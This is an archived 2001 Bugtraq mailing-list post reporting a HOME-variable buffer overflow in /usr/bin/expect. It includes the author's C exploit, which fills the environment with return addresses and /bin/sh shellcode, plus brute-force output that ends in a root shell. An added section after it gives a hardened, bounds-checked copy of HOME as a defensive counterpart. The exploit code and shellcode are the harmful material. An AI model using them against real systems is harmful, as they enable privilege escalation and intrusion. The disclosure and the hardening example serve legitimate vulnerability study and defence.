[Fwd: [Fwd: Returned post for bugtraqat_private]]

From: KF (dotslashat_private)
Date: Tue Jun 05 2001 - 02:04:23 PDT


    I have found an overflow in, and coded the exploit code for, several
    versions of /usr/bin/expect... on SCO, Linux, and BSD variants. I am
    unable to think of a situation where this would be useful due to the
    fact that expect is not suid... can anyone help me determine if this is
    exploitable to obtain root? Perhaps a suid expect script could be
    exploited? Or maybe something like suid kppp which calls expect as a
    helper program?
    
    [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
    [root@linux elguapo]# expect
    Segmentation fault (core dumped)
    
    -Kevin Finisterre
    dotslashat_private
    [attachment: expect.c, text/plain]
    
    //krfinisterreat_private or dotslashat_private
    //this is output from my brute script...
    //722
    //Stack pointer: 0xbffffa18
    //       Offset: 0x2d3
    //  Return addr: 0xbffff745
    //stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
    //$3
    //$L
    //723
    //Stack pointer: 0xbffffa18
    //       Offset: 0x2d4
    //  Return addr: 0xbffff744
    //sh-2.04#
    //note that I was root when I ran this ... expect is not suid
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    #define BUFFERSIZE 533
    
    /* Reads the current stack pointer. 32-bit x86 only: the function has no
       return statement and relies on the value left in %eax being returned. */
    unsigned long sp(void)
    {
            __asm__("movl %esp, %eax");
    }
    
    int main(int argc,char **argv)
    {
            /* payload as posted: spawns /bin/sh */
            char hell[] =
            "\x29\xc0"
            "\x29\xc0"
            "\xb0\x47"
            "\x29\xdb"
            "\xb3\x0c"
            "\x89\xd9"
            "\xcd\x80"
            "\x5e"
            "\x29\xc0"
            "\x88\x46\x07"
            "\x89\x46\x0c"
            "\x89\x76\x08"
            "\xb0\x0b"
            "\x87\xf3"
            "\x8d\x4b\x08"
            "\x8d\x53\x0c"
            "\xcd\x80"
            "\xe8\xe3\xff\xff\xff"
            "\x2f\x62\x69\x6e\x2f\x73\x68";
            int i;
            int offset;
            long esp;
            long ret;
            long *addr_ptr;
            char *buffer, *ptr;
    
            if (argc < 2)
            {
                    fprintf(stderr, "usage: %s <offset>\n", argv[0]);
                    exit(1);
            }
            offset = atoi(argv[1]);
            esp = sp();
            ret = esp-offset;       /* guessed return address; brute.sh walks the offset */
    
            if(!(buffer = malloc(BUFFERSIZE)))
            {
                    printf("oops\n");
                    exit(-1);
            }
    
            /* fill the whole buffer with the guessed return address */
            ptr = buffer;
            addr_ptr = (long *)ptr;
            for (i=0; i<BUFFERSIZE; i+=4)
                    *(addr_ptr++) = ret;
    
            /* first half of the buffer: '\xeb02' is an out-of-range hex escape
               as posted and does not compile cleanly; left as the author wrote it */
            for (i=0; i<BUFFERSIZE/2; i++)
                    buffer[i] = '\xeb02';
    
            /* place the payload in the middle of the buffer */
            ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
            for(i=0; i<strlen(hell); i++)
                    *(ptr++) = hell[i];
    
            buffer[BUFFERSIZE-1] = 0;
    
            /* HOME is the overflowing environment variable */
            setenv("HOME", buffer, 1);
            /* execlp() needs argv[0] followed by a terminating NULL;
               the posted call passed only 0 */
            execlp("/usr/bin/expect", "expect", (char *)0);
            return 0;
    }
    
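The crash in the post is the classic pattern of a fixed-size stack buffer receiving the value of an environment variable through an unbounded copy; for a non-setuid binary that is only a privilege boundary when the environment comes from a less privileged party (the suid-wrapper and suid-script cases the post asks about). The following is an added example, not code from the post or from expect itself, showing the hardened form of that copy: HOME is treated as untrusted, its length is checked before anything is written, and a relative path is refused. The 256-byte limit, the helper names and the sample path /home/elguapo are constructed for the example; the oversized input is the post's own "A" x 433.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed limit for the example; a real program would size the
 * destination from PATH_MAX or allocate it dynamically. */
#define HOME_MAX 256

/* Bounds-checked copy of an environment value into a fixed buffer.
 * Returns 0 on success, -1 if the value is rejected; dst is never
 * written past dstlen and is left untouched on rejection. */
int copy_home_checked(const char *home, char *dst, size_t dstlen)
{
    if (home == NULL || dst == NULL || dstlen == 0)
        return -1;
    size_t n = strlen(home);
    if (n >= dstlen)            /* no room for the NUL: reject, do not truncate */
        return -1;
    if (home[0] != '/')         /* HOME must be an absolute path */
        return -1;
    memcpy(dst, home, n + 1);   /* bounded: n + 1 <= dstlen */
    return 0;
}

/* Helper (constructed): does copy_home_checked() accept this value for a
 * destination of dstlen bytes?  Returns 1 if accepted, 0 if rejected. */
int home_accepted(const char *home, size_t dstlen)
{
    char dst[HOME_MAX];
    if (dstlen > sizeof dst)
        dstlen = sizeof dst;
    return copy_home_checked(home, dst, dstlen) == 0;
}

/* Replays the post's input (HOME = "A" x 433, built here) against a
 * 256-byte destination: the checked copy refuses it instead of overflowing. */
int demo_oversized_home(void)
{
    char home[434];
    memset(home, 'A', 433);
    home[433] = '\0';
    return home_accepted(home, HOME_MAX);   /* 0: rejected */
}

/* A normal value (constructed sample path) is copied intact. */
int demo_normal_home(void)
{
    char dst[HOME_MAX];
    if (copy_home_checked("/home/elguapo", dst, sizeof dst) != 0)
        return 0;
    return strcmp(dst, "/home/elguapo") == 0;   /* 1 */
}

/* Stand-alone use: validate the real HOME of the calling environment. */
int main(void)
{
    const char *home = getenv("HOME");
    char dst[HOME_MAX];
    if (copy_home_checked(home, dst, sizeof dst) != 0) {
        fprintf(stderr, "HOME rejected (unset, relative, or longer than %d bytes)\n",
                HOME_MAX - 1);
        return 1;
    }
    printf("HOME accepted: %s\n", dst);
    return 0;
}
```

Rejecting rather than truncating is deliberate: a silently truncated path can point somewhere the program did not intend, so the check fails closed. Compiled with `cc -o homecheck homecheck.c`, running `HOME=$(perl -e 'print "A" x 433') ./homecheck` exits 1 where the posted expect binary segfaulted.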
    



    This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 08:14:17 PDT